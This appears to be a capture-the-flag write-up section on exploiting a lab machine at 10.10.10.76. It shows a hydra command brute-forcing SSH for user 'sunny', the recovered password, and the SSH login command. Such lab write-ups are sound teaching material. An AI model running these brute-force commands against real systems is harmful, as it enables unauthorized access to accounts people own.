# Exploitation

We know we have SSH on the system on port and we have found usernames. Lets Brute-force using hydra.

## Hydra Brute Force

```
hydra -l sunny -P /usr/share/seclists/Passwords/probable-v2-top1575.txt 10.10.10.76 ssh -s 22022
```

&#x20;Note: There are different ways to use hydra.

![found sunny password: sunday](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MHktrQ3W9xsBXKg37Ta%2F-MHpilpkVYIWqZPDcyv8%2Fimage.png?alt=media\&token=403a67bb-3b05-44b5-884b-03ae17b76d9a)

## Logging in via found credentials

```
ssh -oKexAlgorithms=diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 -p 22022 sunny@10.10.10.76
```

![successful login](https://4057777515-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MHH7KhyMHFxZjjhb__O%2F-MHktrQ3W9xsBXKg37Ta%2F-MHpkjQzlbjtoeqNI5L-%2Fimage.png?alt=media\&token=49ecfa8b-e349-4f6c-8581-3d9963025551)

&#x20;